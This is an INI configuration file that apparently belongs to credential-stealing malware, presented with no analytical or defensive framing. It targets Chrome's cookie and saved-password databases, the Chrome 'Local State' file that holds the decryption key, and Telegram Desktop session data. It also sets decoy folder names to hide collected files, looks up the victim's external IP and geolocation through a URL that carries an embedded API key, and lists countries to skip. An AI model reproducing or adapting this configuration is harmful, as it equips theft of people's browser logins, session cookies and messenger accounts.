[yoo]
masked_folder1 = ImageCache
masked_folder2 = JPGThumbnails
masked_folder3 = fonts_info
key_folder = C:\\Users\\{}\\AppData\\Local\\Google\\Chrome\\User Data\\Local State
whoami = http://myexternalip.com/raw
geoip = https://ip-geolocation.whoisxmlapi.com/api/v1?apiKey=at_E3ZaFqYIB3Z1L60jK9HGJnnxPokao&ipAddress={}

[browsers]
chrome  = C:\\Users\\{}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network\\Cookies
;opera = C:\\Users\\{}\\AppData\\Roaming\\Opera Software\\Opera Stable\\Cookies

[passwords]
chromepass = C:\\Users\\LMF\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data

[telegram]
tdatadir = C:\\Users\\{}\\AppData\\Roaming\\Telegram Desktop\\tdata

[bannedCountries]
US = US
it = it
ES = ES
co = co
mx = mx
ca = ca
fr = fr
bb = bb
